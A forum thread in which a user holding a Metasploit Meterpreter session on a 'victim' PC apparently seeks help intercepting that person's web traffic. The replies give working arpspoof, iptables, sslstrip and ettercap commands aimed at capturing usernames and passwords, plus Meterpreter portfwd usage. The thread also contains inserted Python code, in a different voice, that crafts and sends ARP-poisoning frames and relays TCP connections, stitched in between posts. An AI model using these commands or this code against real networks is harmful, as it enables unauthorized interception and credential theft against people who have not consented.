Thread: Reverse TCP, Ettercap, DNS Spoof

  1. #1
    Just burned their ISO
    Join Date
    Jan 2013
    Posts
    11

    Question Reverse TCP, Ettercap, DNS Spoof

    Hello guys,
    Here is my question.
    I'm connected via a Metasploit payload (reverse TCP) to my victim's PC. Everything is working well.
    And I would like to know if there's a way to capture Internet data from the victim via the Metasploit connection.
    I mean, if I start Ettercap and do a MITM between my attacker PC and my victim's, I'll only see the Meterpreter data being sent, nothing from Internet browsing etc. (from the victim).
    So is this something I can do with reverse TCP, or am I supposed to use another payload?

    Thanks for reading.

  2. #2
    Senior Member
    Join Date
    Jul 2010
    Location
    UK
    Posts
    136

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    How is your MITM attack set up? Please show your method.

  3. #3
    Just burned their ISO
    Join Date
    Jan 2013
    Posts
    11

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    Hello Jimmy87.

    Here is the whole attack setup:


    Here we can see that payload and meterpreter are connected:


    So now what I'd like to do is use the Meterpreter tunnel to run Ettercap on the remote network.
    As if I had a tunneled local network (as Hamachi does), so I could see the victim and his gateway in the Ettercap hosts list.
    Kind of like this:


    Do you think it's possible to go through the Meterpreter tunnel to do this, or do I have to find another way?

  4. #4
    Senior Member
    Join Date
    Jul 2010
    Location
    UK
    Posts
    136

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    So I think you should maybe try this:

    Edit etter.conf and uncomment redir_command_on and redir_command_off within the Linux section:

    Code:
    kate /etc/etter.conf
    Then enable IP forwarding:

    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    Use arpspoof between the victim and the default gateway, e.g.:

    Code:
    # -i: your interface (eth0 or wlan0); -t: the victim's IP; last argument: the default gateway's IP
    arpspoof -i eth0 -t 192.168.1.11 192.168.1.1
    You could then use iptables to redirect port 80 traffic if you wanted web traffic (the reason for uncommenting in step 1), e.g.:

    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    You could then use sslstrip and ettercap (sslstrip to strip the SSL connection and ettercap to get the username and password, if that's what you wanted):

    Code:
    sslstrip -a -k -f          # listens on port 10000 by default, where the REDIRECT rule above sends port 80
    ettercap -T -q -i eth0     # -i: your interface
    After rereading the post, I'm wondering if you need to use this instead of the arpspoof command. But I'm still not sure if this will work! (The above would be OK on the same LAN.)

    Code:
    ettercap -T -M arp:remote
    Last edited by Jimmy87; 02-01-2013 at 05:04 PM.
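    The arpspoof step in the reply above works by sending forged ARP replies, over and over, to the victim and to the gateway. Here is an added example (not from the thread, and not arpspoof's or Ettercap's code) that builds those two frames by hand and parses them back, so you can see what "poisoning" means at the packet level. The IPs are the ones used in this thread; the victim and gateway MACs are made up for the demo, and the attacker MAC is the eth0 address shown later in the thread. send_frames() is Linux-only (AF_PACKET), needs root, and needs a NIC on the victim's own Ethernet/Wi-Fi segment: ARP never crosses a router, so a reverse_tcp session to a host on another network gives no position to send these from.

```python
"""Hand-built ARP poisoning frames: what arpspoof -t <victim> <gateway> (and the
reverse) puts on the wire.  Added example; MACs other than the attacker's are
constructed for the demo."""
import socket
import struct
import time

ETH_P_ARP = 0x0806   # EtherType for ARP
ARP_REPLY = 2        # ARP opcode "reply"


def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet frame carrying the ARP reply 'sender_ip is-at sender_mac', unicast to target."""
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s",
                      1,            # htype: Ethernet
                      0x0800,       # ptype: IPv4
                      6, 4,         # hardware / protocol address lengths
                      ARP_REPLY,
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp            # 14 + 28 = 42 bytes


def parse_arp(frame: bytes) -> dict:
    """Decode an Ethernet/ARP frame into its addresses and opcode."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        raise ValueError(f"not ARP: ethertype 0x{ethertype:04x}")
    _htype, _ptype, _hlen, _plen, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"op": op,
            "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa),
            "eth_src": mac_str(src), "eth_dst": mac_str(dst)}


def poison_pair(attacker_mac: str, victim_mac: str, victim_ip: str,
                gateway_mac: str, gateway_ip: str) -> tuple:
    """The two frames that arpspoof (run once per direction) repeats every couple of seconds:
    the victim is told gateway_ip -> attacker_mac, the gateway is told victim_ip -> attacker_mac.
    Both are needed, or only one half of each connection passes through the attacker."""
    to_victim = build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


def send_frames(iface: str, frames: list, interval: float = 2.0, rounds: int = None) -> int:
    """Put the frames on iface repeatedly (Linux AF_PACKET raw socket, root required).
    Caches re-learn the real mapping once you stop; returns the number of rounds sent."""
    sent = 0
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as raw:   # constructed usage; Linux only
        raw.bind((iface, 0))
        while rounds is None or sent < rounds:
            for frame in frames:
                raw.send(frame)
            sent += 1
            time.sleep(interval)
    return sent


if __name__ == "__main__":
    # Attacker MAC from the thread's ettercap banner; victim/gateway MACs are constructed.
    to_victim, to_gateway = poison_pair("08:00:27:0b:1e:04",
                                        "52:54:00:aa:bb:01", "192.168.1.11",
                                        "52:54:00:aa:bb:02", "192.168.1.1")
    for frame in (to_victim, to_gateway):
        print(parse_arp(frame))
    # send_frames("eth0", [to_victim, to_gateway])   # only from a host on the victim's LAN, as root
```

The frames make sense only if the NIC you send them from shares a broadcast domain with the victim; that is the condition the "(the above would be OK on the same LAN)" remark refers to, and IP forwarding must already be on before the first frame goes out or the victim simply loses connectivity.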

  5. #5
    Just burned their ISO
    Join Date
    Jan 2013
    Posts
    11

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    I still can't see the victim's computer in Ettercap.

    Payload and Meterpreter are connected:

    Here is the relevant part of my etter.conf:
    Code:
    #---------------
    #     Linux 
    #---------------
    
    # if you use ipchains:
       redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
       redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
    
    # if you use iptables:
       redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
       redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    The ip_forward activation command didn't work:
    Code:
    root@bt:~# cat /proc/sys/net/ipv4/ip_forward
    0
    So I edited /etc/sysctl.conf and uncommented the following line:
    Code:
    # Uncomment the next line to enable packet forwarding for IPv4
    #net.ipv4.ip_forward=1
    And I entered your command again, which worked this time.
    So ip_forward is 1 now.

    Your iptables commands were wrong (at least, that's what iptables told me :l). I looked on the Internet and entered this:
    Code:
    iptables -t nat -A PREROUTING --dst 192.168.1.11 -p tcp --dport 80 -j REDIRECT --to-ports 10000
    And I've seen your edit, so I tried:
    Code:
    root@bt:~# ettercap -T -M arp:remote
    
    ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA
    
    Listening on eth0... (Ethernet)
    
      eth0 ->       08:00:27:0B:1E:04       192.168.1.6     255.255.255.0
    
    SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
    Privileges dropped to UID 65534 GID 65534...
    
    etter.dns:1 Invalid ip address
    etter.dns:2 Invalid ip address
    etter.dns:3 Invalid ip address
      28 plugins
      40 protocol dissectors
      55 ports monitored
    7587 mac vendor fingerprint
    1766 tcp OS fingerprint
    2183 known services
    
    
    FATAL: ARP poisoning needs a non empty hosts list.
    So I tried to see my host list with the "L" key:
    It's all blank.

    Then I tried to see the profiles list with the "O" key, then "R" to see the remote hosts:
    No collected Profile !!

    So I tried the "S" key to select a specific host:
    Code:
    ==================================================
    
     1)     192.168.1.1   
     2)     192.168.1.2   
     3)     192.168.1.6   
    Select an host to display (0 for all, -1 to quit): 0
    I tried to capture anyway, but I got nothing; when I opened a web page on my victim's computer, nothing showed up in Ettercap (I ran it without quiet mode).

    And btw, sslstrip is an unknown command in the console; I'll find out how to start it on BT5 =)

    Thanks for your help =) and tell me if I did something wrong.

  6. #6
    Senior Member
    Join Date
    Jul 2010
    Location
    UK
    Posts
    136

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    Weird, the ip_forward command works for me.

    To get sslstrip running, try:
    Code:
    cd /pentest/web/sslstrip
    python setup.py install
    I'm not really sure what else to suggest, sorry; I can't get my head round how you'd be the man in the middle in this setup!

  7. #7
    Just burned their ISO
    Join Date
    Jan 2013
    Posts
    11

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    Thanks for your help anyway!
    I think I'm going to learn more about Meterpreter, because I've seen this recently:

    It seems it supports port forwarding itself; I'll look up how to make it work.

  8. #8
    Senior Member
    Join Date
    Jul 2010
    Location
    UK
    Posts
    136

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    Ok good luck with it, post back any findings!

  9. #9
    Just burned their ISO
    Join Date
    Jan 2013
    Posts
    11

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    OK, even with port forwarding I couldn't redirect packets going through the victim's ports 80 & 443 through ports 43443 and 43444 of mine (ports open in my router, btw). I've read multiple things about this; it seems that people only use it to make a pivot. Anyway, here is the syntax, and the commands I entered:
    Code:
    Syntax:
    portfwd add -l 3389 -p 3389 -r <target host>
    
    "add" will add the port forwarding to the list, and will essentially create a tunnel for us. Please note, this tunnel will also exist outside the Metasploit console, making it available to any terminal session.
    "-l 3389" is the local port that will be listening and forwarded to our target.
    This can be any port on your machine, as long as it's not already being used.
    
    "-p 3389" is the destination port on our targeted host.
    
    "-r <target host>" is our targeted system's IP or hostname.
    According to this, I entered the following commands:
    Code:
    meterpreter > portfwd add -l 43443 -p 80 -r 37.160.50.174
    [*] Local TCP relay created: 0.0.0.0:43443 <-> 37.160.***.***:80
    meterpreter > portfwd add -l 43444 -p 443 -r 37.160.50.174
    [*] Local TCP relay created: 0.0.0.0:43444 <-> 37.160.***.***:443
    But still, when I'm capturing with Wireshark, I only get data from Meterpreter, no HTTP packets from my victim.


    I learned how to sniff packets from the victim with an extension called "sniffer", but if I save the pcap files, is there a way to get clear-text passwords from them? (If HTTPS is used.)
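    The portfwd lines quoted above create a TCP relay: a listener on the attacker's box accepts a connection that the attacker makes, and a new connection to the target's port is opened on its behalf (Meterpreter opens that second connection from the compromised host). Here is an added example, not from the thread and not Metasploit's code, of the same relay in plain Python with a throw-away echo server constructed to stand in for the target; the one simplification is that this relay dials the target directly rather than through a session. Run it and the request comes back, but only because the attacker connected to the relay: a browser on the target never connects to the relay's listening port, so its HTTP traffic never shows up there, which is what the Wireshark observation above reflects.

```python
"""portfwd-style TCP relay: local listener -> target host:port.  Added example;
the echo target and the sample request are constructed for the demo."""
import socket
import threading


def pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src reaches EOF, then half-close dst so the
    other side sees EOF too."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay_connection(client: socket.socket, target: tuple) -> None:
    """Serve one accepted connection: dial the target, then pump both directions."""
    with client, socket.create_connection(target, timeout=5) as remote:
        back = threading.Thread(target=pump, args=(remote, client), daemon=True)
        back.start()
        pump(client, remote)
        back.join()


def start_listener(handler, host: str = "127.0.0.1", port: int = 0):
    """Bind, listen, and run handler(conn) on a thread per connection.
    port=0 lets the OS pick a free port.  Returns (listening socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener was closed
                return
            threading.Thread(target=handler, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def echo_target(conn: socket.socket) -> None:
    """Constructed stand-in for the remote service: echoes whatever arrives."""
    with conn:
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                break
            conn.sendall(chunk)


def start_relay(target: tuple, lport: int = 0):
    """The equivalent of `portfwd add -l <lport> -p <port> -r <host>`: returns (socket, lport)."""
    return start_listener(lambda conn: relay_connection(conn, target), port=lport)


def relay_roundtrip(payload: bytes) -> bytes:
    """Bring up target and relay, push payload through the relay as the attacker would,
    and return whatever came back."""
    target_srv, target_port = start_listener(echo_target)
    relay_srv, relay_port = start_relay(("127.0.0.1", target_port))
    try:
        with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)      # done sending; read until the relay half-closes
            chunks = []
            while True:
                data = c.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks)
    finally:
        relay_srv.close()
        target_srv.close()


if __name__ == "__main__":
    request = b"GET / HTTP/1.0\r\nHost: target.test\r\n\r\n"   # constructed sample request
    print(relay_roundtrip(request) == request)               # True: our own request, there and back
```

The relay is useful for reaching services on the target's side (the "pivot" the posts mention), not for observing the target's outbound traffic; for that you need a capture on the compromised host itself, which is what the sniffer extension mentioned next provides.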

  10. #10
    Senior Member
    Join Date
    Jul 2010
    Location
    UK
    Posts
    136

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    Yeah, I think you're right. I did have a look at Metasploit Unleashed and read a bit about it; I'm guessing you read the same stuff:
    http://www.offensive-security.com/me...ashed/Pivoting

    I'm not sure if this can help you with your pcap request, but take a look if you haven't already seen this:
    http://segfault.in/2010/11/decrypt-h...-and-key-file/
